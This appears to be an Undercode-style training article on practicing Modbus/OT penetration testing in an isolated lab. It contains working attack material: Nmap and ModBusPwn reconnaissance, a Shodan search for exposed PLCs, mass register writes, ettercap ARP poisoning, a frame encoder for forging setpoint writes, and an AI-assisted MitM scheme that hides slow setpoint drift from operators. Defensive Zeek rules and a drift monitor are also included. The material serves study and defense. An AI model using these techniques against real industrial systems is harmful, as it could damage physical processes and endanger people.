From Zero to Modbus Mayhem: How to Practice OT Penetration Testing Without Breaking the Law (or a Plant) + Video

Introduction:

Operational Technology (OT) environments—the systems that run power grids, water treatment facilities, and manufacturing assembly lines—are increasingly connected to IT networks, yet they remain dangerously exposed. The Modbus TCP protocol, a foundational pillar of industrial communication, transmits data in cleartext without built-in authentication or encryption, making it a prime target for adversaries. For security professionals, the challenge is stark: practicing attacks on a live production plant is illegal and potentially catastrophic, while theoretical knowledge alone fails to build the muscle memory needed to defend against real threats. This article explores a safe, legal, and highly realistic approach to OT penetration testing using isolated lab environments, walking through the complete kill chain—from reconnaissance and traffic analysis to register manipulation and AI-assisted man-in-the-middle attacks.

Learning Objectives:

  • Objective 1: Master OT network reconnaissance techniques to identify and fingerprint industrial devices such as PLCs, HMIs, and historians using Nmap and specialized Modbus scanning tools.
  • Objective 2: Develop hands-on proficiency in analyzing live Modbus TCP traffic, manipulating holding registers, and observing the physical consequences of cyber-physical attacks in a controlled setting.
  • Objective 3: Understand how to execute and detect man-in-the-middle attacks on Modbus networks, including the use of AI to automate packet manipulation and evade traditional intrusion detection systems.

You Should Know:

1. The Lay of the Land: OT Network Reconnaissance and Device Fingerprinting

The first step in any OT penetration test is understanding the network topology and identifying critical assets. Unlike IT environments where hosts are plentiful and dynamic, OT networks are typically flat, predictable, and populated by specialized devices. The crown jewels are Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), and historians that log process data.

To begin mapping the network, a targeted Nmap scan is essential. Standard port scans can be intrusive and may crash fragile legacy devices, so the scan must be narrow and gentle: a full TCP connect scan (`-sT`) completes the handshakes the device's TCP stack expects, service-version (`-sV`) and OS detection (`-O`) probes are left out because their malformed or unexpected packets are exactly what upsets old firmware, and on anything but a lab the rate should be throttled with `--max-rate` or `--scan-delay`. The following command performs a TCP connect scan on port 502 (the default Modbus TCP port) and port 44818 (used by EtherNet/IP), running only non-disruptive discovery scripts:

nmap -sT -p 502,44818 --script modbus-discover,enip-info 192.168.1.0/24

This command identifies live Modbus devices and extracts basic information without sending malicious payloads, although it is not silent: `modbus-discover` issues Report Slave ID requests (function code 0x11) to enumerate unit IDs, so a defender watching port 502 will see it. Tools such as `modbus-fuzzer` belong to a different phase altogether: a fuzzer sends malformed frames to find crash conditions, which is precisely what can knock a fragile PLC offline, so it is a lab-only instrument rather than a reconnaissance tool. For deeper fingerprinting, dedicated frameworks such as ModBusPwn can be used. ModBusPwn is a comprehensive Modbus TCP exploitation framework that provides a full suite of tools for SCADA/ICS reconnaissance, fingerprinting, and exploitation. To detect a PLC’s model, firmware version, and serial number, run:

python3 ModBusPwn.py -t 192.168.1.10 --detect

For broader exposure discovery, ModBusPwn integrates with Shodan to find internet-facing Modbus devices (for authorized research only):

python3 ModBusPwn.py -s -a <YOUR_SHODAN_API_KEY> -c US -l 50 -p 2

Graphical Modbus clients such as `ModScan32` (Windows) or `QModMaster` (cross-platform, Qt-based) can perform equivalent reconnaissance by polling devices and walking register ranges; bear in mind that they are masters in their own right, so every poll is a request the PLC answers, not passive observation. The key takeaway is that OT reconnaissance is about patience and precision: every packet sent is a potential clue for defenders.

2. Sniffing the Wires: Live Modbus Traffic Analysis

Once devices are identified, the next phase is passive traffic analysis. Modbus TCP operates on port 502 and uses a simple request-response model where a master (the client, e.g., a SCADA server or HMI) polls slaves (the servers, typically PLCs) for data; the current specification uses the terms client and server, but tools, captures and most engineers still say master and slave. Every message carries a 7-byte MBAP header (transaction identifier, protocol identifier, length, unit identifier) followed by the function code and its data. Because the protocol is cleartext, an attacker with network access can capture and interpret all traffic using Wireshark or TShark.

To filter Modbus traffic from a packet capture file on Kali Linux, use:

tshark -r capture.pcapng -Y "mbtcp" -T fields -e ip.src -e ip.dst -e mbtcp.unit_id -e modbus.func_code -e modbus.reference_num

Filtering on `mbtcp` rather than `tcp.port == 502` keeps only frames that actually carry a Modbus/TCP header, so handshake and bare ACK segments on port 502 do not appear as rows with empty fields. The command extracts source/destination IPs, the unit identifier, Modbus function codes, and reference numbers (the starting register address as it appears on the wire), providing a clear picture of which registers are being read or written. Understanding function codes is crucial: code 0x03 reads holding registers, 0x06 writes a single register, and 0x10 writes multiple registers (0x01, 0x05 and 0x0F do the same for coils). Holding registers are the ones listed as 4xxxx in HMI tag databases and in tools like ModScan32, but on the wire they are addressed by zero-based offset: 40001 is `modbus.reference_num` 0, 40002 is 1, and so on, a translation that trips up many first-time scripts. They are particularly attractive targets because they store variables that control physical processes: motor speeds, valve positions, temperature setpoints.

In a lab environment like Labshock’s Netfields zone, you can observe live Modbus traffic between a motor assembly line’s PLC and HMI, learning to distinguish normal polling patterns from anomalous commands. This passive phase is about building a baseline: understanding what “normal” looks like so that deviations become obvious.

3. The Touch: Modbus Register Manipulation and Physical Impact

The most critical phase of an OT penetration test is active exploitation—manipulating registers to affect physical processes. In a production environment, this is illegal and dangerous; in a lab, it’s the core learning experience.

Using the ModBusPwn exploit toolkit, an attacker can scan for writable registers and inject malicious values. To identify writable registers on a target PLC:

python3 ModBusPwn.py -t 192.168.1.10

Then, to write a value (e.g., 9999) to all discovered writable registers:

python3 ModBusPwn.py -t 192.168.1.10 -m 9999

For more granular control, the Metasploit framework includes Modbus auxiliary modules. After launching Metasploit, search for Modbus modules:

msf6 > search modbus

The `auxiliary/scanner/scada/modbus_findunitid` module can enumerate unit (slave) IDs and `auxiliary/scanner/scada/modbusclient` reads and writes coils and registers from msfconsole, while custom scripts using the `pymodbus` library allow precise register reads and writes. A simple Python script (pymodbus 3.x API) to read holding register 40001, which is address 0 on the wire:

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient('192.168.1.10')  # Modbus/TCP, port 502 by default
client.connect()
# Wire addresses are zero-based: holding register 40001 is address 0, not 40001.
result = client.read_holding_registers(0, count=1)
if result.isError():
    print("Modbus exception:", result)  # e.g. illegal data address
else:
    print(result.registers)
client.close()

The keyword that selects the unit identifier changed across pymodbus 3.x releases (`slave=` in earlier versions, `device_id=` in later ones), so check the version you installed before targeting a gateway that routes by unit ID; the example above relies on the default.

The true value of this phase is observing the consequence. In a simulated environment like Netfields, changing a register value causes a motor to speed up, slow down, or stop. This immediate cyber-physical feedback loop teaches the attacker (and defender) how digital actions translate to physical outcomes—a lesson no textbook can provide.
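The two phases above, reading frames off the wire (section 2) and writing a register (section 3), come down to a handful of bytes. The following added example, which is not part of the original article and not code from Labshock, Netfields, ModBusPwn or pymodbus, encodes and decodes Modbus/TCP request frames using only the standard library and drives them through an in-memory stand-in for a PLC, so the address translation, the echoed 0x06 response and the exception a PLC returns for an out-of-range address can be seen without a lab. The register layout (ten holding registers, address 2 as the speed setpoint), the unit ID and the values are assumptions made up for the example.

```python
"""Modbus/TCP encoder, decoder and in-memory PLC for the two register phases above.

Added example for this article, not code from Labshock, Netfields, ModBusPwn or pymodbus.
Wire layout (big-endian), as the text describes it:
  MBAP: transaction id (2) | protocol id (2, always 0) | length (2) | unit id (1); then
  PDU:  function code (1) | function-specific data. Length counts unit id + PDU.
Wire register addresses are zero-based; the 4xxxx numbers shown by HMIs are addr + 40001.
The fake PLC layout (10 holding registers, address 2 = speed setpoint) is an assumption.
"""
import struct

FC_READ_HOLDING, FC_WRITE_SINGLE, FC_WRITE_MULTI = 0x03, 0x06, 0x10
EXC_ILLEGAL_FUNCTION, EXC_ILLEGAL_ADDRESS = 0x01, 0x02

def to_modicon(addr):
    """Wire offset -> holding-register number shown by HMIs (0 -> 40001)."""
    return 40001 + addr

def build_adu(tid, unit, pdu):
    """Prepend the 7-byte MBAP header to a PDU."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def read_holding_request(tid, unit, addr, count):
    return build_adu(tid, unit, struct.pack(">BHH", FC_READ_HOLDING, addr, count))

def write_single_request(tid, unit, addr, value):
    return build_adu(tid, unit, struct.pack(">BHH", FC_WRITE_SINGLE, addr, value))

def write_multi_request(tid, unit, addr, values):
    head = struct.pack(">BHHB", FC_WRITE_MULTI, addr, len(values), 2 * len(values))
    return build_adu(tid, unit, head + struct.pack(">%dH" % len(values), *values))

def parse_request(frame):
    """Decode a request ADU (or an exception response, which shares the header).
    Returns what a defender wants from a capture: unit, function, register, write or not."""
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("malformed MBAP header")
    pdu, fc = frame[7:], frame[7]
    rec = {"tid": tid, "unit": unit, "fc": fc & 0x7F, "exception": None,
           "write": (fc & 0x7F) in (FC_WRITE_SINGLE, FC_WRITE_MULTI)}
    if fc & 0x80:                       # exception response: fc | 0x80, exception code
        rec["exception"] = pdu[1]
        return rec
    if fc == FC_READ_HOLDING:
        rec["addr"], rec["count"] = struct.unpack(">HH", pdu[1:5])
    elif fc == FC_WRITE_SINGLE:
        rec["addr"], rec["value"] = struct.unpack(">HH", pdu[1:5])
    elif fc == FC_WRITE_MULTI:
        rec["addr"], n, nbytes = struct.unpack(">HHB", pdu[1:6])
        rec["values"] = list(struct.unpack(">%dH" % n, pdu[6:6 + nbytes]))
    if "addr" in rec:
        rec["modicon"] = to_modicon(rec["addr"])
    return rec

def read_response_values(frame):
    """Registers carried by a 0x03 response PDU: fc | byte count | values."""
    nbytes = frame[8]
    return list(struct.unpack(">%dH" % (nbytes // 2), frame[9:9 + nbytes]))

def plc_handle(registers, frame):
    """Act as the slave: apply the request to `registers`, return the response ADU.
    Nothing here checks who is asking; any host reaching port 502 can change a setpoint."""
    req = parse_request(frame)
    tid, unit, fc = req["tid"], req["unit"], req["fc"]
    if fc == FC_READ_HOLDING:
        a, n = req["addr"], req["count"]
        if a + n > len(registers):
            return build_adu(tid, unit, bytes([fc | 0x80, EXC_ILLEGAL_ADDRESS]))
        pdu = struct.pack(">BB", fc, 2 * n) + struct.pack(">%dH" % n, *registers[a:a + n])
        return build_adu(tid, unit, pdu)
    if fc == FC_WRITE_SINGLE:
        if req["addr"] >= len(registers):
            return build_adu(tid, unit, bytes([fc | 0x80, EXC_ILLEGAL_ADDRESS]))
        registers[req["addr"]] = req["value"]
        return frame                    # a 0x06 response echoes the request
    if fc == FC_WRITE_MULTI:
        a, vals = req["addr"], req["values"]
        if a + len(vals) > len(registers):
            return build_adu(tid, unit, bytes([fc | 0x80, EXC_ILLEGAL_ADDRESS]))
        registers[a:a + len(vals)] = vals
        return build_adu(tid, unit, struct.pack(">BHH", fc, a, len(vals)))
    return build_adu(tid, unit, bytes([fc | 0x80, EXC_ILLEGAL_FUNCTION]))

if __name__ == "__main__":
    plc = [0] * 10
    plc[2] = 1500                       # assumed: 40003 holds the motor speed setpoint
    attack = write_single_request(1, 1, 2, 9999)
    print(parse_request(attack))        # fc 6, addr 2, modicon 40003, write True
    plc_handle(plc, attack)             # setpoint is now 9999; the "motor" reacts
    print(read_response_values(plc_handle(plc, read_holding_request(2, 1, 0, 4))))
```

Send the `attack` bytes over a plain TCP socket to port 502 of a lab PLC and the same frame changes a real setpoint; the decoder half is what a Zeek-style monitor runs over every frame it sees, and the exception path shows why a scanner that walks addresses until it gets exception code 0x02 can map a PLC's register space.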

4. The Silent Operator: AI-Powered Man-in-the-Middle Attacks

Modbus’s lack of encryption and authentication makes it highly vulnerable to man-in-the-middle (MitM) attacks. By positioning themselves between the master and slave, an attacker can intercept, modify, or drop packets in real time. Traditional MitM attacks use ARP poisoning with tools like Ettercap, which forwards the intercepted traffic itself so the two victims keep talking. ARP poisoning is disruptive in its own right on a real plant (PLCs and HMIs with small ARP tables and tight poll timeouts can drop off the network while the caches churn), which is one more reason this belongs in a lab. On Kali Linux, the command to poison the ARP cache between a controller (IP 10.0.0.1) and an HMI (IP 10.0.0.2) is:

ettercap -T -i eth0 -M arp /10.0.0.1// /10.0.0.2//

However, the real innovation lies in using AI to automate and enhance MitM attacks. An AI model can be trained on normal Modbus traffic patterns to learn the expected values of critical registers. During an attack, the AI can then:

  • Inject subtle deviations: Instead of writing extreme values that trigger alarms, the AI modifies registers by small, incremental amounts that drift the process outside safe parameters over time.
  • Evade detection: The AI can ensure that response packets to the master contain normal-looking values (previously recorded) while the slave receives malicious commands. This replay of recorded readings to the operator makes the intrusion nearly invisible on the HMI.
  • Adapt in real time: If the defender changes a setpoint, the AI can adjust its manipulation strategy on the fly, maintaining persistence.

Implementing this requires a script that sits in the forwarding path rather than beside it: Scapy can craft and inject packets, but it cannot hold back a frame it merely sniffed, so the usual construction is ARP poisoning plus a netfilter queue (`iptables ... -j NFQUEUE` with the NetfilterQueue Python binding) or a small TCP proxy, with Scapy used to decode and rebuild the Modbus payload and to recompute the TCP checksum (the MBAP length field stays the same as long as the modified value has the same size). Ettercap’s own filters (`-F`, compiled with `etterfilter`) already do the static version of this byte rewriting. The learning component is a model (e.g., an isolation forest or autoencoder) trained on benign traffic; the attacker uses it as a stand-in for the defender’s anomaly detector, scoring each candidate modification and keeping only those that score as normal. While sophisticated, this approach is becoming increasingly feasible and represents the next frontier in OT security testing.

5. The Defender’s Dilemma: Detection and Forensics in OT

Every attack generates noise—anomalous packets, out-of-sequence commands, or unexpected register values. For the defender, the goal is to distinguish between a fault (a legitimate malfunction) and an attack. In a lab environment, you can practice both sides: execute an attack and then analyze the traffic to see how it appears in logs and SIEM tools.

Using Zeek (formerly Bro) with custom scripts, you can detect abnormal Modbus activity. Zeek’s Modbus analyzer writes a `modbus.log` of every function call and raises a per-function event for each request, such as `modbus_write_single_register_request`, which hands a script the connection, the register address and the value. A Zeek script can therefore flag any write command to a holding register that exceeds a predefined threshold or originates from an IP that is not on the allowlist of engineering stations and HMIs. On the forensic side, tools like Wireshark’s “Follow TCP Stream” feature allow deep inspection of individual Modbus sessions, revealing exactly what commands were sent and when; the MBAP transaction identifier pairs each response with its request, which is how you prove which write the PLC actually acknowledged.
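To make the detection side concrete for both the slow-drift manipulation described in section 4 and the write rules this section attributes to Zeek, here is an added example (not the article’s, Labshock’s or Zeek’s code) that runs three rules over decoded capture rows: an allowlist of hosts permitted to write, an engineering range per register, and a window check that catches small increments whose sum leaves the expected band even though every single write looks legitimate. The rows are constructed for the example and mirror the tshark field command from section 2 with a relative timestamp (`frame.time_relative`) and the written register value added; the host roles, the register meaning and all limits are assumptions, as is the Wireshark field name for the written value (`modbus.regval_uint16`), which you should confirm with `tshark -G fields | grep modbus` on your version.

```python
"""Rule-based monitor for Modbus writes, run over decoded capture fields.

Added example for this article; not Labshock's, Zeek's or Wireshark's code.
Each input line mimics one tab-separated row of
  tshark -r capture.pcapng -Y mbtcp -T fields -e frame.time_relative -e ip.src \
         -e ip.dst -e modbus.func_code -e modbus.reference_num -e modbus.regval_uint16
Host roles, register meaning and limits are assumptions made up for the example, and
the field name modbus.regval_uint16 is assumed (check `tshark -G fields`).
"""

AUTHORIZED_WRITERS = {"10.0.0.2"}   # assumed: only the HMI may write
LIMITS = {0: (1200, 1800)}          # assumed: wire address 0 (40001) = motor speed setpoint
DRIFT_WINDOW = 5                    # consecutive accepted writes to compare
DRIFT_TOLERANCE = 100               # total movement inside the window that is suspicious
WRITE_FUNCS = {6, 16}               # 0x06 write single register, 0x10 write multiple

# Constructed sample: one legitimate write, one poll, one crude attack from a rogue
# host, then a slow drift of +30 per write that never leaves the 1200-1800 band.
SAMPLE = """\
0.00\t10.0.0.2\t10.0.0.1\t6\t0\t1500
1.00\t10.0.0.2\t10.0.0.1\t3\t0\t
2.00\t10.0.0.9\t10.0.0.1\t6\t0\t9999
3.00\t10.0.0.2\t10.0.0.1\t6\t0\t1530
4.00\t10.0.0.2\t10.0.0.1\t6\t0\t1560
5.00\t10.0.0.2\t10.0.0.1\t6\t0\t1590
6.00\t10.0.0.2\t10.0.0.1\t6\t0\t1620
"""


def parse_line(line):
    """Turn one tab-separated row into a record; value is None for reads."""
    t, src, dst, fc, addr, val = line.split("\t")
    return {"t": float(t), "src": src, "dst": dst, "fc": int(fc),
            "addr": int(addr), "value": int(val) if val else None}


def monitor(text):
    """Return (time, rule, detail) alerts for the three write rules."""
    alerts = []
    history = {}                        # addr -> recent accepted values
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["fc"] not in WRITE_FUNCS:
            continue                    # reads are the normal polling baseline
        bad = False
        if rec["src"] not in AUTHORIZED_WRITERS:
            alerts.append((rec["t"], "unauthorized_writer",
                           f"{rec['src']} wrote register {rec['addr']}"))
            bad = True
        lo, hi = LIMITS.get(rec["addr"], (0, 0xFFFF))
        if rec["value"] is not None and not lo <= rec["value"] <= hi:
            alerts.append((rec["t"], "out_of_range",
                           f"value {rec['value']} outside {lo}-{hi}"))
            bad = True
        if bad or rec["value"] is None:
            continue
        # Drift rule: each write passed the checks above; judge the trajectory instead.
        hist = history.setdefault(rec["addr"], [])
        hist.append(rec["value"])
        del hist[:-DRIFT_WINDOW]        # keep only the last DRIFT_WINDOW values
        if len(hist) == DRIFT_WINDOW and abs(hist[-1] - hist[0]) > DRIFT_TOLERANCE:
            alerts.append((rec["t"], "drift",
                           f"register {rec['addr']} moved {hist[0]} -> {hist[-1]} "
                           f"over {DRIFT_WINDOW} writes"))
    return alerts


if __name__ == "__main__":
    for t, rule, detail in monitor(SAMPLE):
        print(f"t={t:.2f} {rule}: {detail}")
```

The first two rules are the ones a Zeek script expresses per event; the third is what a MitM attacker who spoofs the HMI’s address and stays inside the alarm band still trips, because it reasons about where the setpoint is going rather than about one packet. Tune `DRIFT_WINDOW` and `DRIFT_TOLERANCE` from the baseline captured in the passive phase, otherwise a legitimate ramp-up by the operator raises the same alert.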

Labshock integrates these detection capabilities, providing a complete OT security lab with a built-in SIEM, IDS, and traffic collector. By practicing attacks and then switching to the blue team role, you build a holistic understanding of the adversarial mindset and the defensive countermeasures needed to protect critical infrastructure.

6. Putting It All Together: The Netfields Experience

The Netfields zone within the Labshock platform embodies the principles discussed above. It is a realistic industrial network, emulated rather than production, with a motor assembly line, live Modbus traffic, and a process that “fights back” when you touch it. The environment is fully isolated, so there is no risk to production systems and no legal jeopardy.

The prescribed learning path in Netfields is:

  1. Map the network using Nmap and Modbus discovery tools.
  2. Find the PLC, HMI, and historian through fingerprinting.
  3. Analyze Modbus traffic to understand normal behavior and identify writable registers.
  4. Run Kali Linux against the process, using tools like ModBusPwn or Metasploit.
  5. Manipulate a register and watch the motor react in real time.
  6. Observe the impact of your actions on the machine and the network traffic.
  7. Write your own Modbus client to automate attacks.
  8. Use AI to perform a MitM attack, modifying traffic on the fly.

This progression moves from passive reconnaissance to active exploitation and finally to advanced, AI-driven attacks—mirroring the tactics of sophisticated adversaries.

What Undercode Say:

  • Key Takeaway 1: OT security cannot be learned from theory alone. Practicing attacks in a safe, isolated lab is essential to understanding the adversary’s perspective and building effective defenses. Platforms like Labshock and Netfields provide the closest thing to a real plant without the legal and safety risks.

  • Key Takeaway 2: The Modbus protocol is fundamentally insecure, and its widespread use in critical infrastructure makes it a persistent vulnerability. However, by mastering reconnaissance, traffic analysis, and both traditional and AI-enhanced attack techniques, security professionals can develop the skills needed to detect and mitigate these threats before they cause real-world damage.

The analysis reveals a critical gap in the cybersecurity industry: while IT penetration testing is well-established with countless labs and certifications, OT security remains a niche field with limited safe practice opportunities. This is changing. The emergence of accessible, realistic OT lab environments democratizes industrial security training, enabling a new generation of defenders to learn by doing. The ability to safely “touch” a live industrial process—to see a motor move in response to a packet you crafted—is transformative. It builds an intuitive understanding of cyber-physical risk that no amount of slideware can replicate. As AI continues to evolve, the attack surface will only grow, making hands-on, adversarial practice not just beneficial, but imperative.

Prediction:

  • +1 The democratization of OT security labs will accelerate the growth of a skilled industrial cybersecurity workforce, closing the talent gap that currently leaves critical infrastructure vulnerable.

  • +1 AI-driven attack and defense tools will become standard in OT penetration testing, leading to more robust and adaptive security measures that can counter sophisticated, persistent threats.

  • -1 As AI-powered attack tools become more accessible, the barrier to entry for malicious actors will lower, increasing the frequency and sophistication of attacks against industrial targets.

  • -1 The inherent insecurity of legacy protocols like Modbus means that even with improved detection, the fundamental risk of catastrophic cyber-physical failure will persist until widespread migration to secure, authenticated protocols occurs. A TLS-wrapped variant, Modbus/TCP Security on port 802, already exists, but given the long lifecycle of industrial equipment its adoption will take decades.

▶️ Related Video:

https://www.youtube.com/watch?v=8a1yTN2kFNw

Reported By: Zakharb You – Hackers Feeds